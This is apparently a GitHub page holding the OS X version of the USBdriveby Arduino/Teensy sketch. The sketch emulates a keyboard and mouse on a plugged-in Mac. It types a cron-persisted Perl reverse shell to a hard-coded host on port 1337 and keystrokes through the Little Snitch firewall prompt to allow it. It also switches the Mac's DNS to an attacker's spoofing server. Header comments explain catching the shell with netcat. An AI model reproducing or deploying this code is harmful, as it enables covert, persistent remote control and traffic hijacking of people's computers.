forked from samyk/usbdriveby
-
Notifications
You must be signed in to change notification settings - Fork 0
/
usbdriveby_osx.ino
291 lines (226 loc) · 6.19 KB
/
usbdriveby_osx.ino
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
// USBdriveby, by samy kamkar
// This is the OS X version. Windows version is in usbdriveby_windows.ino
//
// https://samy.pl/usbdriveby
// in order to listen for the backdoor installed, simply run netcat:
// nc -l 1337
// this listens on port 1337 for a connection from an infected machine
// and once connected, you can begin send commands to the machine!
// here is the ip of the remote dns server we're running which responds to normal DNS requests, but spoofs other requests we specify
// code for our dns spoofing server is at http://samy.pl/usbdriveby
#define EVIL_SERVER "66.228.55.205"
// delay ms
int ds = 500;
#if defined(CORE_TEENSY)
#define LED_PIN 11
#else
#define LED_PIN 13
#endif
// Choose if you want to have the Teensy submit Little Snitch with the mouse, or the keyboard.
// Uncomment USE_MOUSE to use the mouse instead of the keyboard to submit Little Snitch.
// #define USE_MOUSE
void setup()
{
// give us a little time to connect up
delay(1000);
// allow controlling LED
pinMode(LED_PIN, OUTPUT);
// turn the LED on while we're pwning
digitalWrite(LED_PIN, HIGH);
// open spotlight (or alfred/qs), then System Preferences<return>
openapp("System Preferences");
// now open Terminal
openapp("Terminal");
// open new terminal window
cmd(KEY_N);
// if the little snitch firewall is
// installed, let's permanently add our
// remote host so they never get asked to
// allow the connection since little
// snitch allows the keyboard to control it
//
// if there is no little snitch, we perform
// keystrokes that, in Terminal, will
// cause no issues.
pwnLittleSnitch();
// add our reverse tunneling backdoor to
// cron to run every 5 minutes
typeln("(crontab -l ; echo \"*/5 * * * * perl -MIO::Socket -e'\\$c=new IO::Socket::INET(\\\"72.14.179.47:1337\\\");print\\$c \\`\\$_\\`while<\\$c>'\") | crontab -");
// Now move the System Preferences window where we want it, top left corner
typeln("osascript -e 'tell application \"System Events\" to set bounds of window \"System Preferences\" of application \"System Preferences\" to {0, 0, 700, 700}'");
// tell application "System Events" to set
// bounds of window "System Preferences"
// of application "System Preferences"
// to {0, 0, 700, 700}
// CMD+Tab back into System Preferences
cmd(KEY_TAB);
// CMD+F to go into System Preferences search box
cmd(KEY_F);
// Type in DNS Servers<return>
typeln("DNS Servers");
// may take a while
delay(3000);
// Key down in DNS servers, enter to change, and type in IP
k(KEY_DOWN);
typeln("");
typeln(EVIL_SERVER);
#if !defined(CORE_TEENSY)
// Start moving the mouse -- this function only needed for arduinos
Mouse.begin();
#endif
// Move to top left of screen
for (int i = 0; i < 1000; i++)
{
Mouse.move(-10, -10);
delay(1);
}
// If we have hot corners enabled, move out and move back in
for (int i = 0; i < 100; i++)
{
Mouse.move(1, 1);
delay(5);
}
delay(500);
for (int i = 0; i < 100; i++)
{
Mouse.move(-1, -1);
delay(5);
}
delay(500);
// move to "OK" button
Mouse.move(100, 100);
Mouse.move(100, 100);
Mouse.move(100, 100);
Mouse.move(100, 100);
Mouse.move(100, 100);
Mouse.move(70, 10);
// Move to 580,540 (ok button)
for (int i = 0; i < 54*5; i++)
{
// Mouse.move(1, 1);
delay(10);
}
delay(1000);
// Click OK in DNS window
Mouse.click();
delay(500);
// Click Apply in Network window
Mouse.move(0, 20);
delay(1000);
Mouse.click();
// Quit System Preferences/Network
cmd(KEY_Q);
// CMD+Tab back into Terminal
// cmd(KEY_TAB);
delay(1000);
// then close the terminal window
typeln("");
typeln("exit");
// exit terminal (if nothing is running)
cmd(KEY_Q);
// in case another window is running in terminal,
// don't quit terminal in popup window by hitting ESC
k(KEY_ESC);
// we're done!
}
// type a string (pressing enter at the end)
// we have extra delays so we can see what's happening
void typeln(String chars)
{
Keyboard.print(chars);
delay(ds);
Keyboard.println("");
delay(ds * 4);
}
// open an application on OS X via spotlight/alfred
void openapp(String app)
{
// open spotlight (or alfred/qs), then the app
cmd(KEY_SPACE);
typeln(app);
}
void k(int key)
{
Keyboard.set_key1(key);
Keyboard.send_now();
delay(ds/2);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(ds/2);
}
void mod(int mod, int key)
{
Keyboard.set_modifier(mod);
Keyboard.send_now();
Keyboard.set_key1(key);
Keyboard.send_now();
delay(ds);
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(ds);
}
void ctrl(int key)
{
mod(MODIFIERKEY_CTRL, key);
}
void cmd(int key)
{
mod(MODIFIERKEY_GUI, key);
}
void shift(int key)
{
mod(MODIFIERKEY_SHIFT, key);
}
void loop()
{
// blink quickly so we know we're done
digitalWrite(LED_PIN, HIGH);
delay(ds/2);
digitalWrite(LED_PIN, LOW);
delay(ds/2);
}
// evade little snitch if it's installed, but don't fumble if not installed
void pwnLittleSnitch()
{
// connect to our reverse tunneled backdoor to
// get little snitch to open if it's installed
typeln("perl -MIO::Socket -e'$c=new IO::Socket::INET(\"72.14.179.47:1337\")'");
// move our keyboard using the arrow keys to allow this host permanently ;)
k(KEY_UP);
k(KEY_LEFT);
// go to beginning of line if there's no little snitch (Ctrl+A)
// since we would still be in terminal
ctrl(KEY_A); // go to beginning of line (Ctrl+a)
shift(KEY_3); // add a # (shift+3)
ctrl(KEY_C); // ^C to exit line (Ctrl+c)
// Here is where we submit Little Snitch with either a keyboard or mouse, based on what you selected above.
#ifdef USE_MOUSE
// Move to top left of screen
for (int i = 0; i < 1000; i++)
{
Mouse.move(-10, -10);
delay(1);
}
// If we have hot corners enabled, move out and move back in
for (int i = 0; i < 100; i++)
{
Mouse.move(1, 1);
delay(5);
}
delay(500);
// move to Little Snitch Allow button
Mouse.move(100, 100);
delay(20);
Mouse.move(100, 100);
delay(20);
Mouse.move(120, -70);
delay(1000);
Mouse.click(); // Click click!
delay(ds);
}
#else
cmd(KEY_ENTER); // submit little snitch with keyboard.
#endif
delay(ds);
}